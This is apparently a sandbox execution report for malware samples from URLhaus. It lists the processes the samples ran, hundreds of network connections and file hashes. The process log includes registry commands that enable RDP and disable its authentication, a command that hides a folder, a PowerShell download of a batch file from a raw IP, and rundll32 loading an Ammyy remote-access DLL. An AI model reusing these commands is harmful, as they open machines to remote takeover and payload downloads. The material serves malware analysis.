"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3744 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\test.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test.exe"

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"

C:\Users\Admin\Downloads\UrlHausFiles\V1.1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\V1.1.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2004 /prefetch:2

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2732 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2708 /prefetch:1

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fAllowUnsolicited /t REG_DWORD /d "00000001"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4904 /prefetch:2

C:\Windows\AppCompat\Programs\360.exe

C:\Windows\AppCompat\Programs\360.exe

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v UserAuthentication /t REG_DWORD /d "00000000"

C:\Windows\AppCompat\Programs\360Srv.exe

C:\Windows\AppCompat\Programs\360Srv.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5948 -ip 5948

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

"C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2380 /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Windows\SYSTEM32\rundll32.exe

rundll32.exe "C:\ProgramData\AMMYY\aa_nts.dll",run

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff81223cb8,0x7fff81223cc8,0x7fff81223cd8

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /f /v SecurityLayer /t REG_DWORD /d "00000001"

C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe

"C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe"

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7003340511369147430,16570635516799937,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2220 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,7003340511369147430,16570635516799937,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,7003340511369147430,16570635516799937,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7003340511369147430,16570635516799937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7003340511369147430,16570635516799937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7003340511369147430,16570635516799937,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

"C:\Users\Admin\Downloads\UrlHausFiles\file.exe"

C:\Windows\SYSTEM32\wscript.exe

"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.66.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
N/A 127.0.0.1:49879 tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 utorrent-backup-server4.top udp
FR 5.253.59.29:80 5.253.59.29 tcp
FR 5.253.59.29:80 5.253.59.29 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
NL 45.200.148.45:443 tcp
NL 45.200.148.45:443 tcp
NL 45.200.148.45:443 tcp
CN 139.196.31.48:14417 tcp
CN 139.196.31.48:2324 tcp
JP 121.1.252.90:80 121.1.252.90 tcp
CN 114.215.27.238:2324 tcp
CN 101.229.61.157:8072 tcp
CN 114.215.27.238:8100 tcp
CN 110.90.9.121:8072 tcp
CN 114.215.27.238:8072 tcp
CN 61.144.96.138:888 tcp
TR 5.26.97.52:88 5.26.97.52 tcp
JP 122.31.166.101:80 122.31.166.101 tcp
CH 138.188.34.220:80 138.188.34.220 tcp
IN 111.118.250.244:80 111.118.250.244 tcp
CA 76.11.16.231:80 76.11.16.231 tcp
US 75.18.210.21:80 75.18.210.21 tcp
HK 219.77.72.53:80 219.77.72.53 tcp
BR 179.89.224.192:80 179.89.224.192 tcp
CA 99.233.83.22:80 99.233.83.22 tcp
MO 202.175.60.117:80 202.175.60.117 tcp
FR 80.15.103.89:80 80.15.103.89 tcp
CN 112.27.225.72:8001 tcp
CN 110.40.250.173:2324 tcp
CN 113.85.101.199:81 tcp
US 67.190.47.69:8081 67.190.47.69 tcp
CN 124.70.36.56:80 tcp
KR 121.142.127.237:8605 121.142.127.237 tcp
CN 121.235.184.125:9000 tcp
CN 61.183.16.127:14417 tcp
CN 58.208.14.94:88 tcp
KR 218.155.74.6:7070 218.155.74.6 tcp
CN 150.158.146.215:80 tcp
CN 49.81.40.231:111 tcp
BR 187.59.102.238:9090 187.59.102.238 tcp
CN 111.42.156.130:8000 tcp
BR 189.61.50.98:8080 189.61.50.98 tcp
US 159.250.122.151:8081 159.250.122.151 tcp
CN 47.103.126.166:8072 tcp
US 68.59.153.1:49274 68.59.153.1 tcp
HK 149.88.73.206:80 149.88.73.206 tcp
US 141.155.36.213:41790 141.155.36.213 tcp
CA 184.145.33.5:80 184.145.33.5 tcp
CN 43.241.17.145:8899 tcp
KR 121.154.20.150:80 121.154.20.150 tcp
US 96.250.166.185:88 96.250.166.185 tcp
US 24.252.169.236:80 24.252.169.236 tcp
CA 76.67.131.51:80 76.67.131.51 tcp
MX 187.144.154.105:80 187.144.154.105 tcp
CA 76.68.62.152:80 76.68.62.152 tcp
CA 99.234.132.85:80 99.234.132.85 tcp
MX 187.225.233.208:80 187.225.233.208 tcp
KR 14.37.138.88:8602 14.37.138.88 tcp
CA 142.67.169.45:80 142.67.169.45 tcp
BE 109.137.108.215:8083 109.137.108.215 tcp
US 166.145.98.1:80 166.145.98.1 tcp
FR 109.210.138.197:80 109.210.138.197 tcp
TR 5.26.174.234:80 5.26.174.234 tcp
BG 87.121.86.16:80 utorrent-backup-server4.top tcp
RU 31.41.244.11:80 31.41.244.11 tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
TH 103.230.121.124:443 nine.ddns.net tcp
TH 103.230.121.124:443 nine.ddns.net tcp
TH 103.230.121.124:443 nine.ddns.net tcp
TH 103.230.121.124:443 nine.ddns.net tcp
US 8.8.8.8:53 security-service-api-link.cc udp
TH 103.230.121.124:443 nine.ddns.net tcp
TH 103.230.121.124:443 nine.ddns.net tcp
TH 103.230.121.124:80 nine.ddns.net tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 utorrent-backup-server5.top udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:80 github.com tcp
US 166.167.172.14:8007 166.167.172.14 tcp
CN 47.104.233.213:14319 tcp
CN 36.138.125.70:8089 tcp
IN 122.170.110.131:9105 122.170.110.131 tcp
US 170.55.7.234:80 170.55.7.234 tcp
US 144.34.162.13:80 fish.hackbiji.cc tcp
US 67.213.59.251:80 67.213.59.251 tcp
CN 111.231.145.137:8888 tcp
US 158.101.35.62:9000 158.101.35.62 tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
HK 47.79.66.211:80 a19ccc1.oss-cn-hongkong.aliyuncs.com tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
RU 81.177.6.164:80 arcloud.ru tcp
PL 91.225.132.57:80 static-91-225-132-57.devs.futuro.pl tcp
TR 46.20.5.15:80 files5.uludagbilisim.com tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
RU 46.17.104.173:80 ns.smallsrv.com tcp
US 8.8.8.8:53 197.138.210.109.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 220.34.188.138.in-addr.arpa udp
US 8.8.8.8:53 185.166.250.96.in-addr.arpa udp
US 8.8.8.8:53 213.36.155.141.in-addr.arpa udp
US 8.8.8.8:53 236.169.252.24.in-addr.arpa udp
US 8.8.8.8:53 51.131.67.76.in-addr.arpa udp
US 8.8.8.8:53 231.16.11.76.in-addr.arpa udp
US 8.8.8.8:53 152.62.68.76.in-addr.arpa udp
US 8.8.8.8:53 5.33.145.184.in-addr.arpa udp
US 8.8.8.8:53 22.83.233.99.in-addr.arpa udp
US 8.8.8.8:53 85.132.234.99.in-addr.arpa udp
US 8.8.8.8:53 45.169.67.142.in-addr.arpa udp
US 8.8.8.8:53 234.174.26.5.in-addr.arpa udp
US 8.8.8.8:53 1.153.59.68.in-addr.arpa udp
US 8.8.8.8:53 69.47.190.67.in-addr.arpa udp
US 8.8.8.8:53 244.250.118.111.in-addr.arpa udp
US 8.8.8.8:53 151.122.250.159.in-addr.arpa udp
US 8.8.8.8:53 21.210.18.75.in-addr.arpa udp
US 8.8.8.8:53 105.154.144.187.in-addr.arpa udp
US 8.8.8.8:53 208.233.225.187.in-addr.arpa udp
US 8.8.8.8:53 98.50.61.189.in-addr.arpa udp
US 8.8.8.8:53 192.224.89.179.in-addr.arpa udp
US 8.8.8.8:53 53.72.77.219.in-addr.arpa udp
US 8.8.8.8:53 238.102.59.187.in-addr.arpa udp
US 8.8.8.8:53 90.252.1.121.in-addr.arpa udp
US 8.8.8.8:53 117.60.175.202.in-addr.arpa udp
US 8.8.8.8:53 150.20.154.121.in-addr.arpa udp
US 8.8.8.8:53 101.166.31.122.in-addr.arpa udp
US 8.8.8.8:53 237.127.142.121.in-addr.arpa udp
US 8.8.8.8:53 234.7.55.170.in-addr.arpa udp
US 8.8.8.8:53 251.59.213.67.in-addr.arpa udp
US 8.8.8.8:53 88.138.37.14.in-addr.arpa udp
US 8.8.8.8:53 6.74.155.218.in-addr.arpa udp
US 8.8.8.8:53 206.73.88.149.in-addr.arpa udp
US 8.8.8.8:53 131.110.170.122.in-addr.arpa udp
US 8.8.8.8:53 62.35.101.158.in-addr.arpa udp
US 8.8.8.8:53 13.162.34.144.in-addr.arpa udp
US 8.8.8.8:53 124.121.230.103.in-addr.arpa udp
US 8.8.8.8:53 52.97.26.5.in-addr.arpa udp
US 172.67.130.102:80 down.mvip8.ru tcp
RU 45.90.34.133:443 pb.agnt.ru tcp
US 8.8.8.8:53 desquer.ens.uabc.mx udp
US 81.28.12.12:80 utorrent-servers.xyz tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
MA 102.53.15.18:80 102.53.15.18 tcp
KR 119.204.11.2:80 defgyma.com tcp
CN 101.71.255.146:8195 tcp
CN 139.196.217.38:80 tengfeidn.com tcp
RU 176.113.115.215:80 176.113.115.215 tcp
IN 116.206.151.203:478 116.206.151.203 tcp
KR 121.53.202.238:80 cfs9.blog.daum.net tcp
MX 148.231.192.3:80 desquer.ens.uabc.mx tcp
US 144.34.162.13:80 fish.hackbiji.cc tcp
BG 88.80.152.1:80 arcsystem.rodopibg.net tcp
KR 58.149.249.168:80 58.149.249.168 tcp
KR 183.115.102.3:80 183.115.102.3 tcp
CN 39.100.33.142:9092 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
KR 125.186.91.61:80 125.186.91.61 tcp
US 144.34.162.13:3333 fish.hackbiji.cc tcp
CN 223.247.198.16:14319 tcp
US 204.9.23.122:85 204.9.23.122 tcp
NL 149.154.167.99:443 t.me tcp
CN 139.159.155.204:88 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
CN 222.186.172.42:1000 tcp
CN 1.31.109.62:80 download.suxiazai.com tcp
CN 112.27.189.32:8090 tcp
DE 116.203.8.137:443 kotov.lol tcp
US 172.67.208.213:443 tail-cease.cyou tcp
HK 47.79.66.205:443 a12xxx1.oss-cn-hongkong.aliyuncs.com tcp
CN 61.131.3.86:9991 tcp
CN 211.149.230.178:80 www.hseda.com tcp
CN 117.50.194.20:80 tcp
CN 123.132.224.187:14417 tcp
DE 116.203.8.137:443 kotov.lol tcp
HK 8.217.48.27:80 www.qqqmy.com tcp
CN 202.107.235.202:8088 tcp
CN 159.75.57.69:443 sgz-1302338321.cos.ap-guangzhou.myqcloud.com tcp
DE 116.203.8.137:443 kotov.lol tcp
GB 2.22.99.85:443 steamcommunity.com tcp
RU 176.111.174.140:80 176.111.174.140 tcp
CN 139.159.155.204:81 tcp
IR 185.79.156.69:80 osecweb.ir tcp
AT 195.26.206.107:80 www.opolis.io tcp
TH 58.9.110.23:18063 tcp
DE 116.203.8.137:443 kotov.lol tcp
FR 20.209.8.43:443 pouya.blob.core.windows.net tcp
TR 5.26.97.52:80 5.26.97.52 tcp
CN 61.160.195.64:80 139520.aioc.qbgxl.com tcp
RU 185.215.113.66:80 loeghaiofiehfihf.to tcp
DE 45.76.89.70:80 pool.hashvault.pro tcp
RU 176.111.174.140:80 176.111.174.140 tcp
DE 116.203.8.137:443 kotov.lol tcp
CN 203.2.65.29:8081 tcp
CN 61.154.0.139:9000 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
CN 59.110.104.183:8888 hnjgdl.geps.glodon.com tcp
AU 110.143.54.213:80 110.143.54.213 tcp
US 23.122.210.174:80 23-122-210-174.lightspeed.cicril.sbcglobal.net tcp
DE 116.203.8.137:443 kotov.lol tcp
RU 176.111.174.140:80 176.111.174.140 tcp
DE 116.203.8.137:443 kotov.lol tcp
RU 176.111.174.140:80 176.111.174.140 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
IR 185.79.156.69:443 osecweb.ir tcp
US 24.93.22.147:8081 24.93.22.147 tcp
RU 185.215.113.66:80 loeghaiofiehfihf.to tcp
RU 176.111.174.138:8000 176.111.174.138 tcp
TH 147.50.240.62:80 147.50.240.62 tcp
IN 122.179.136.112:80 122.179.136.112 tcp
DO 181.36.153.151:81 181.36.153.151 tcp
RU 176.111.174.140:1912 tcp
US 8.8.8.8:53 62.240.50.147.in-addr.arpa udp
CN 61.182.69.190:11111 tcp
JP 113.156.110.218:81 113.156.110.218 tcp
US 162.159.140.237:443 pub-37d3986658af451c9d52bb9f482b3e2d.r2.dev tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 2.18.190.73:80 r11.o.lencr.org tcp
BR 186.225.153.226:443 palharesinformatica.com.br tcp
CN 60.220.213.249:80 d.kpzip.com tcp
GB 172.217.16.228:443 www.google.com udp
RU 185.215.113.16:80 185.215.113.16 tcp
HK 47.79.66.210:443 a15aaa1.oss-cn-hongkong.aliyuncs.com tcp
RU 87.236.16.222:443 www.saf-oil.ru tcp
CN 124.70.140.100:80 tcp
HK 103.149.92.191:80 103.149.92.191 tcp
GB 142.250.178.14:443 clients2.google.com tcp
DE 116.203.8.137:443 kotov.lol tcp
KR 211.220.36.213:80 211.220.36.213 tcp
DE 116.203.8.137:443 kotov.lol tcp
IR 185.79.156.69:443 osecweb.ir tcp
DE 116.203.8.137:443 kotov.lol tcp
DE 116.203.8.137:443 kotov.lol tcp
DE 116.203.8.137:443 kotov.lol tcp
US 206.217.142.166:1234 tcp
PL 217.12.206.79:80 tcp
CN 122.51.183.116:1234 tcp
US 8.8.8.8:53 cfs5.tistory.com udp
IR 217.172.98.87:443 karoonpc.com tcp
KR 210.116.108.238:80 server.toeicswt.co.kr tcp
CN 203.2.65.29:8085 tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
NL 194.122.191.15:90 194.122.191.15 tcp
CN 223.247.198.16:8072 tcp
RU 185.215.113.205:8080 185.215.113.205 tcp
FR 80.11.228.144:10140 80.11.228.144 tcp
US 98.109.126.66:41798 98.109.126.66 tcp
RU 77.72.254.210:17017 77.72.254.210 tcp
SG 168.138.162.78:80 168.138.162.78 tcp
CN 115.28.26.10:8080 tcp
RU 176.113.115.37:80 176.113.115.37 tcp
CN 47.120.46.210:80 tcp
KR 221.143.49.222:80 221.143.49.222 tcp
CN 119.91.25.19:8888 tcp
HK 134.122.129.19:80 134.122.129.19 tcp
NL 83.87.76.41:80 83-87-76-41.cable.dynamic.v4.ziggo.nl tcp
RU 176.111.174.140:443 tcp
CN 116.62.242.43:80 tcp
ES 94.76.156.101:280 94.76.156.101 tcp
US 8.8.8.8:53 205.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 210.254.72.77.in-addr.arpa udp
US 8.8.8.8:53 66.126.109.98.in-addr.arpa udp
US 8.8.8.8:53 15.191.122.194.in-addr.arpa udp
US 8.8.8.8:53 78.162.138.168.in-addr.arpa udp
US 8.8.8.8:53 222.49.143.221.in-addr.arpa udp
IR 217.172.98.87:80 karoonpc.com tcp
GB 20.26.156.215:80 github.com tcp
ES 178.60.25.240:80 178.60.25.240 tcp
IN 103.14.122.111:80 unicorpbrunei.com tcp
CN 159.75.57.35:443 sgz-1302338321.cos.ap-guangzhou.myqcloud.com tcp
HK 58.152.32.99:8001 58.152.32.99 tcp
ES 178.156.109.69:81 178.156.109.69 tcp
CN 8.130.82.167:80 tcp
HK 47.79.66.208:80 a18qqq1.oss-cn-hongkong.aliyuncs.com tcp
RU 178.130.39.138:80 artemka.spb.ru tcp
CN 139.196.217.38:80 tengfeidn.com tcp
US 50.31.188.149:443 cvinetwork.org tcp
KR 211.231.99.68:80 cfs5.tistory.com tcp
RU 185.215.113.66:80 loeghaiofiehfihf.to tcp
TR 31.145.124.122:80 www.teknoarge.com tcp
CN 112.5.156.15:20006 data.yhydl.com tcp
CN 180.167.115.186:8011 tcp
HK 154.12.82.11:808 154.12.82.11 tcp
HK 156.245.12.221:8000 156.245.12.221 tcp
CN 47.110.247.171:80 tcp
CN 125.33.229.165:8085 tcp
RU 45.90.34.133:80 pb.agnt.ru tcp
TH 58.9.110.23:18063 tcp
US 8.8.8.8:53 aaaa.qqqmy.com udp
NL 188.42.129.148:80 rl.ammyy.com tcp
DE 136.243.104.235:443 tcp
HK 8.217.48.27:443 aaaa.qqqmy.com tcp
HK 8.217.48.27:443 aaaa.qqqmy.com tcp
HK 8.217.48.27:80 aaaa.qqqmy.com tcp
CN 123.235.29.162:6713 tcp
SG 43.153.232.151:80 xss-1253555722.cos.ap-singapore.myqcloud.com tcp
HK 103.68.192.104:80 taodianla.com tcp
US 8.8.8.8:53 148.129.42.188.in-addr.arpa udp
HK 219.73.22.64:8084 219.73.22.64 tcp
US 8.8.8.8:53 64.22.73.219.in-addr.arpa udp
TN 41.230.16.223:8889 41.230.16.223 tcp
SE 129.151.210.233:8000 129.151.210.233 tcp
US 68.178.207.33:8000 68.178.207.33 tcp
DE 136.243.18.118:80 www.ammyy.com tcp
US 68.178.207.33:8000 68.178.207.33 tcp
AU 80.249.6.118:8084 80.249.6.118 tcp
NL 185.180.196.46:80 185.180.196.46 tcp
RU 176.113.115.178:80 176.113.115.178 tcp
TH 45.141.26.170:80 45.141.26.170 tcp
CN 60.29.43.10:8072 tcp
DE 136.243.18.118:443 www.ammyy.com tcp
HK 8.217.48.27:443 aaaa.qqqmy.com tcp
HK 8.217.48.27:443 aaaa.qqqmy.com tcp
N/A 224.0.0.251:5353 udp
HK 8.217.48.27:80 aaaa.qqqmy.com tcp
CN 1.15.110.72:2022 tcp
JP 111.217.175.54:80 111.217.175.54 tcp
IT 185.81.0.56:80 www.netsolution.it tcp
US 68.178.207.33:8000 68.178.207.33 tcp
CN 113.219.142.35:80 www.aqianniao.com tcp
VN 103.77.173.146:80 103.77.173.146 tcp
DE 116.203.8.137:443 kotov.lol tcp
CN 39.103.150.56:8888 tcp
RU 193.233.48.194:80 tcp
DE 116.203.8.137:443 kotov.lol tcp
HK 156.245.12.57:8000 156.245.12.57 tcp
CN 60.22.23.50:9898 tcp
DE 116.203.8.137:443 kotov.lol tcp
DE 116.203.8.137:443 kotov.lol tcp
US 104.21.56.70:443 post-to-me.com tcp
US 66.254.114.41:443 www.pornhub.com tcp
DE 116.203.8.137:443 kotov.lol tcp
GB 64.210.156.20:443 static.trafficjunky.com tcp
GB 64.210.156.20:443 static.trafficjunky.com tcp
GB 64.210.156.20:443 static.trafficjunky.com tcp
GB 64.210.156.19:443 static.trafficjunky.com tcp
GB 64.210.156.19:443 static.trafficjunky.com tcp
GB 64.210.156.19:443 static.trafficjunky.com tcp
GB 64.210.156.19:443 static.trafficjunky.com tcp
GB 64.210.156.19:443 static.trafficjunky.com tcp
GB 64.210.156.19:443 static.trafficjunky.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI22802\python311.dll

MD5 9a24c8c35e4ac4b1597124c1dcbebe0f
SHA1 f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256 a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA512 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

C:\Users\Admin\AppData\Local\Temp\_MEI22802\VCRUNTIME140.dll

MD5 f12681a472b9dd04a812e16096514974
SHA1 6fd102eb3e0b0e6eef08118d71f28702d1a9067c
